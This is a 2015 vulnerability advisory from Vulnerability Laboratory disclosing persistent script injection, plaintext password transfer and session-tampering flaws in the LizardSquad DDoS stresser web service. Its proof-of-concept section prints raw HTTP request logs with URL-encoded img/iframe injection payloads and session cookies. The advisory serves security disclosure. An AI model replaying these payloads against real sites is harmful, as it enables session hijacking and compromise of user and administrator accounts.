Document Title:
===============
LizardSquad DDoS Stresser - Multiple Vulnerabilities


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1417

http://magazine.vulnerability-db.com/?q=articles/2015/01/20/lizardsquad-ddos-stresser-multiple-vulnerabilities-revealed-takeover-ddos#


Release Date:
=============
2015-01-20


Vulnerability Laboratory ID (VL-ID):
====================================
1417


Common Vulnerability Scoring System:
====================================
8.9


Product & Service Introduction:
===============================
The product, called Lizard Stresser is a stress tester that might let you see how your own network stands up to DDoS attacks, 
like the ones that interrupted the gaming networks for several days last week. DDoS attacks basically overload servers with 
massive amounts of bogus requests.

(Copy of the Homepage: https://lizardstresser.su/ )


Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered multiple vulnerabilities in the official LizardSquad DDoS Stresser online-service web-application.


Vulnerability Disclosure Timeline:
==================================
2015-01-20:  Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
LizardSquad
Product: DDoS Stresser - Web Application (Online-Service) 2015 Q1


Exploitation Technique:
=======================
Remote


Severity Level:
===============
High


Technical Details & Description:
================================
Multiple web vulnerabilities has been discovered in the official LizardSquad `Stresser DDoS Service` web-application.

1.1
The 1st vulnerability is located in `username` value of the registration module. A user can register a script code as payload 
to the name values. The ddos web-service of the input on registration uses the wrong conditions to encode and parse. Thus allows 
to execute the injected script code in the `./ref` module of the service. The request method to inject is POST and the 
vulnerability is located on the application-side of the ddos stresser service. The main administrators are able to see the user 
passwords, by watching the logs of an compromised server you see that they can switch by login in through the registered user accounts. 
This is possible because of plain transfered passwords in the ddos application. The known event can be used to prepare malicious code 
that executes function in connection with application-side injected script codes. The vulnerable file to inject the code is the 
register.php file. Another execution of the injected script code occurs in the main dashboard (left sidebar) were the username 
is getting visible.

Vulnerable Module(s):
        [+] Registration (./ref)

Vulnerable Parameter(s):
        [+] username

Affected Module(s):
        [+] Dashboard (Username in Left Sidebar)


1.2
The 2nd vulnerability is located in the Ticket Title & Ticket Content input fields of the `Tickets` (tickets) module. A fresh registered 
user account is able to inject own malicious persistent script code to the ticket input fields to exploit a backend administrator account. 
After an attacker registers and inject own script code to the ticket system he is able to get the ip of the backend users or can compromise 
the session data of moderators/administrators. The inject occurs in the `./tickets` module. The execution takes place locally in the listed 
open ticket items of the backend. Remote attackers are also able to access other tickets and stored information by intercepting the session 
of the add Ticket POST method request.

Vulnerable Module(s):
        [+] Tickets (./tickets)

Vulnerable Parameter(s):
        [+] name (servername)

1.3
The 3rd vulnerability is located in the target server `name` value. The attacker uses the device or servername to send malicious data to the 
ddos application control panel. A remote attacker can change the server or device name value to a script code payload that executes in the 
panel (server target list). The service syncs the the device/server name value after the infection but also if the attacker syncs the 
data manually. In case of usage macOS to attack it is possible to change the servername easily to a malicious script code payload that 
affects the ddos control panel.

Vulnerable Module(s):
        [+] server list

Vulnerable Parameter(s):
        [+] name (servername)

1.4
The 4th vulnerability is located in the `dasboard > user settings > change password` module. The data in the POST method to change the own 
account password is send in plain-text. Thus allows remote attackers and network administors to capture compromised accounts. The service can 
also be observed by man-in-the-middle attacks in the local network.

Vulnerable Module(s):
        [+] dasboard > user settings > change password


1.5
The 5th vulnerability is also located in the `dasboard > user settings > change password` module. The POST method request of the change function in the 
ddos application can be intercepted by attackers to compromise the service. The remote attacker logs in as user and intercepts the session information by 
changing to an existing user account. Successul exploitation of the session tampering issues results in account system compromise (administrators/customers).

Vulnerable Module(s):
        [+] dasboard > user settings > change password

Vulnerable Parameter(s):
        [+] id


Proof of Concept (PoC):
=======================
1.1
--- PoC Session Logs [POST] (Injection) ---
Status: 200[OK]
POST http://lizardstresser.su/usercp Load Flags[LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] Größe des Inhalts[-1] Mime Type[text/html]
   Request Header:
      Host[lizardstresser.su]
      User-Agent[Mozilla/5.0 

(Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Referer

[http://lizardstresser.su/usercp]
      Cookie[__cfduid=dede840b76815fd52769922600b1e086c1421749609; PHPSESSID=f4i5t8vhqgscb0adhtkqlcvv01]
      Connection[keep-alive]
   POST-Daten:
      cpassword[chaos666]
      npassword[http%3A%2F

%2Flizardstresser.su%2F%3Fr%3Dimgsrcx2020iframesrca20iframe]
      rpassword[http%3A%2F%2Flizardstresser.su%2F%3Fr%3Dimgsrcx2020iframesrca20iframe]
      updatePassBtn[Change+Stored+Data%21]
   Response Header:
      Date[Tue, 20 Jan 2015 

10:29:21 GMT]
      Content-Type[text/html]
      Transfer-Encoding[chunked]
      Connection[keep-alive]
      Expires[Thu, 19 Nov 1981 08:52:00 GMT]
      Cache-Control[no-store, no-cache, must-revalidate, post-check=0, pre-check=0]
      

Pragma[no-cache]
      Server[cloudflare-nginx]
      CF-RAY[1aba972a06dd15b3-FRA]
      Content-Encoding[gzip]
-
Status: 302[Moved Temporarily]
POST https://lizardstresser.su/register.php 
Load Flags[LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] Größe des Inhalts[-1] Mime Type[text/html]
   Request Header:
      Host[lizardstresser.su]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Referer[https://lizardstresser.su/register.php]
      Cookie[__cfduid=dede840b76815fd52769922600b1e086c1421749609; PHPSESSID=f4i5t8vhqgscb0adhtkqlcvv01]
      Connection[keep-alive]
   POST-Daten:
      username[%22%3E%3C%22%3Cimg+src%3D%22x%22%3E%2520%2520%3E%22%3Ciframe+src%3Da%3E%2520%3Ciframe%3E2]
      password[chaos666]
      rpassword[chaos666]
      email[research%40vulnerbaility-lab.com]
      ref[%2F]
      checkbox1[1]
      register[Register]
   Response Header:
      Server[cloudflare-nginx]
      Date[Tue, 20 Jan 2015 11:20:02 GMT]
      Content-Type[text/html]
      Expires[Thu, 19 Nov 1981 08:52:00 GMT]
      Cache-Control[no-store, no-cache, must-revalidate, post-check=0, pre-check=0]
      Pragma[no-cache]
      Location[/purchase]
      CF-RAY[1abae168238f15b3-FRA]
      X-Firefox-Spdy[3.1]


Reference(s):
http://lizardstresser.su/?r=imgsrcx2020iframesrca20iframe
https://lizardstresser.su/register.php


1.2
--- PoC Session Logs [POST] (Injection) ---
Status: 200[OK]
POST http://lizardstresser.su/ajax/addticket.php 
Load Flags[LOAD_BYPASS_CACHE  LOAD_BACKGROUND  ] Größe des Inhalts[-1] Mime Type[text/html]
   Request Header:
      Host[lizardstresser.su]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0]
Accept[*/*]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Content-Type[application/x-www-form-urlencoded; charset=UTF-8]
      X-Requested-With[XMLHttpRequest]
      Referer[http://lizardstresser.su/tickets]
      Content-Length[324]
      Cookie[__cfduid=dede840b76815fd52769922600b1e086c1421749609; PHPSESSID=f4i5t8vhqgscb0adhtkqlcvv01]
      Connection[keep-alive]
      Pragma[no-cache]
      Cache-Control[no-cache]
   POST-Daten:
      title2[%22%3E%3C%22%3Cimg+src%3D%22x%22%3E%2520%2520%3E%22%3Ciframe+src%3Da%3E%2520%3Ciframe%3E]
      code[%22%3E%3C%22%3Cimg+src%3D%22x%22%3E%2520%2520%3E%22%3Ciframe+src%3Da%3E%2520%3Ciframe%3E]
content[%22%3E%3C%22%3Cimg+src%3D%22x%22%3E%2520%2520%3E%22%3Ciframe+src%3Da%3E%2520%3Ciframe%3E]
      hash[JMX02SbuIwklRiGPAVDgeOC5nTs41xFp]
   Response Header:
      Date[Tue, 20 Jan 2015 10:30:54 GMT]
      Content-Type[text/html]
Transfer-Encoding[chunked]
      Connection[keep-alive]
      Expires[Thu, 19 Nov 1981 08:52:00 GMT]
      Cache-Control[no-store, no-cache, must-revalidate, post-check=0, pre-check=0]
      Pragma[no-cache]
      Server[cloudflare-nginx]
  CF-RAY[1aba996d3d7115b3-FRA]
      Content-Encoding[gzip]

Reference(s):
http://lizardstresser.su/ajax/addticket.php


Credits & Authors:
==================
Vulnerability Laboratory [Research Team]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed 
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable 
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab 
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for 
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, 
policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com     - www.vuln-lab.com                 - www.evolution-sec.com
Contact:    admin@vulnerability-lab.com   - research@vulnerability-lab.com              - admin@evolution-sec.com
Section:    magazine.vulnerability-db.com  - vulnerability-lab.com/contact.php             - evolution-sec.com/contact
Social:      twitter.com/#!/vuln_lab     - facebook.com/VulnerabilityLab              - youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php  - vulnerability-lab.com/rss/rss_upcoming.php       - vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php    - vulnerability-lab.com/list-of-bug-bounty-programs.php  - vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to 
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by 
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website 
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact 
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

        Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™



-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt